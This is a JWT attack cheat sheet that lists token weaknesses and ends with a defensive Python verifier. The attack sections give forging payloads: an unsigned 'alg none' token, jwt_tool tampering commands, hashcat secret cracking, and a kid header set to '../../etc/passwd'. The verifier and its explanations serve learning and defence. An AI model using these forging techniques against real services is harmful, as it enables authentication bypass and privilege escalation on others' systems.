High Severity | A03
🎫 JWT Attack Techniques
🧠 Description
JSON Web Token (JWT) attacks exploit vulnerabilities in token handling, signing algorithms, and validation logic to bypass authentication, escalate privileges, or forge tokens.
Common JWT Weaknesses:
- Algorithm None: Accept unsigned tokens
- Algorithm Confusion: RS256 to HS256 switch
- Weak Keys: Public key as HMAC secret
- No Validation: Accept expired tokens
💣 Attack Techniques
```bash
# Algorithm None
# Change alg to "none" and remove signature
eyJhbGciOiJub25lIiwiYWxnIjoibm9uIn0.eyJ1c2VyIjoiYWRtaW4ifQ.

# Algorithm Confusion (RS256 to HS256)
# Get public key from JWKS endpoint
# Use as HMAC secret to sign token

# jwt_tool usage (token argument goes before the mode flag)
python3 jwt_tool.py eyJ... -T
python3 jwt_tool.py -I -Hc admin -pd '{"sub":"admin"}'

# hashcat for brute force (mode 16500 = JWT)
hashcat -m 16500 jwt.txt wordlist.txt
```
🛡️ Authentication Bypass
```text
# Modify user claim
# Change {"sub":"user"} to {"sub":"admin"}

# Time-based attacks
# Remove exp claim or set far future date

# jku/x5u manipulation
# Point to attacker-controlled JWKS

# kid injection
# kid: "../../etc/passwd"
# Use for path traversal in key lookup

# Key ID Injection
{"alg":"HS256","typ":"JWT","kid":"../../etc/passwd"}
```
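Every weakness listed above (alg none, RS256/HS256 confusion, missing exp validation, kid path traversal, attacker-supplied jku/x5u) comes down to the verifier trusting something in the token header that only the server should decide. The following stdlib-only Python verifier is an added defensive example, not code from the original cheat sheet or from jwt_tool; the key id `key-2024`, the secret and the fixed clock value are constructed for the demo. It pins the algorithm server-side, resolves `kid` only through an exact allowlist lookup (never a file path), ignores jku/x5u entirely, checks the signature in constant time before reading any claim, and treats a missing `exp` as a failure rather than as "never expires".

```python
import base64
import hashlib
import hmac
import json
import time
from typing import Optional

# Pinned algorithm set: the server decides the algorithm, never the token header.
ALLOWED_ALGS = {"HS256"}
# Key lookup by exact kid match in a dict, not a file path, so a kid such as
# "../../etc/passwd" can never reach the filesystem. Secret is constructed for the demo.
KEYS = {"key-2024": b"constructed-demo-secret-do-not-reuse"}


class TokenError(Exception):
    """Raised for any token that must not be accepted."""


def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode("ascii")


def b64url_decode(seg: str) -> bytes:
    # Re-add the padding that JWTs strip; urlsafe_b64decode raises ValueError on bad input.
    return base64.urlsafe_b64decode(seg + "=" * (-len(seg) % 4))


def decode_json_segment(seg: str) -> dict:
    try:
        obj = json.loads(b64url_decode(seg))
    except ValueError as exc:  # covers binascii.Error, JSONDecodeError and bad UTF-8
        raise TokenError("malformed segment") from exc
    if not isinstance(obj, dict):
        raise TokenError("segment is not a JSON object")
    return obj


def sign_hs256(header: dict, payload: dict, key: bytes) -> str:
    """Issue an HS256 token; used here only to build demo and test inputs."""
    h = b64url_encode(json.dumps(header, separators=(",", ":")).encode("utf-8"))
    p = b64url_encode(json.dumps(payload, separators=(",", ":")).encode("utf-8"))
    sig = hmac.new(key, f"{h}.{p}".encode("ascii"), hashlib.sha256).digest()
    return f"{h}.{p}.{b64url_encode(sig)}"


def verify(token: str, now: Optional[int] = None) -> dict:
    """Return the payload of a valid token, or raise TokenError."""
    now = int(time.time()) if now is None else now
    parts = token.split(".")
    if len(parts) != 3:
        raise TokenError("token must have exactly three segments")
    h_b64, p_b64, s_b64 = parts
    header = decode_json_segment(h_b64)

    # 1. Algorithm pinning: rejects "none"/"None" and any RS256 -> HS256 switch.
    if header.get("alg") not in ALLOWED_ALGS:
        raise TokenError(f"algorithm not allowed: {header.get('alg')!r}")

    # 2. kid handling: allowlist lookup only. jku/x5u headers are never consulted.
    key = KEYS.get(header.get("kid"))
    if key is None:
        raise TokenError("unknown kid")

    # 3. Signature check (constant-time compare) before any claim is trusted.
    expected = hmac.new(key, f"{h_b64}.{p_b64}".encode("utf-8"), hashlib.sha256).digest()
    try:
        given = b64url_decode(s_b64)
    except ValueError as exc:
        raise TokenError("malformed signature") from exc
    if not hmac.compare_digest(expected, given):
        raise TokenError("signature mismatch")

    # 4. exp is mandatory and must lie in the future; absence is a failure, not "never expires".
    payload = decode_json_segment(p_b64)
    exp = payload.get("exp")
    if isinstance(exp, bool) or not isinstance(exp, int) or exp <= now:
        raise TokenError("missing or expired exp")
    return payload


def is_valid(token: str, now: Optional[int] = None) -> bool:
    try:
        verify(token, now)
        return True
    except TokenError:
        return False


if __name__ == "__main__":
    now = 1_700_000_000  # fixed clock so the demo is reproducible
    good = sign_hs256({"alg": "HS256", "typ": "JWT", "kid": "key-2024"},
                      {"sub": "user", "exp": now + 3600}, KEYS["key-2024"])
    none_tok = (b64url_encode(b'{"alg":"none","typ":"JWT","kid":"key-2024"}') + "."
                + b64url_encode(b'{"sub":"admin","exp":2000000000}') + ".")
    print("signed token :", is_valid(good, now))      # True
    print("alg none     :", is_valid(none_tok, now))  # False
```

The order of the checks matters: the algorithm and key are fixed from server configuration before the signature is computed, and the payload is only parsed after the signature has passed, so a forged `sub` or a stripped `exp` never reaches application logic. When moving this to a real library, keep the same shape: pass an explicit `algorithms` allowlist to the library's decode call, and require `exp` rather than merely validating it when present.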
🛠️ Tools
```bash
# jwt.io - online decoder/debugger
# https://jwt.io/

# jwt_tool
python3 jwt_tool.py eyJ... -T
python3 jwt_tool.py eyJ... -I -Hvp "admin"

# Burp JWT Editor extension
# Decode, modify, sign with known key
```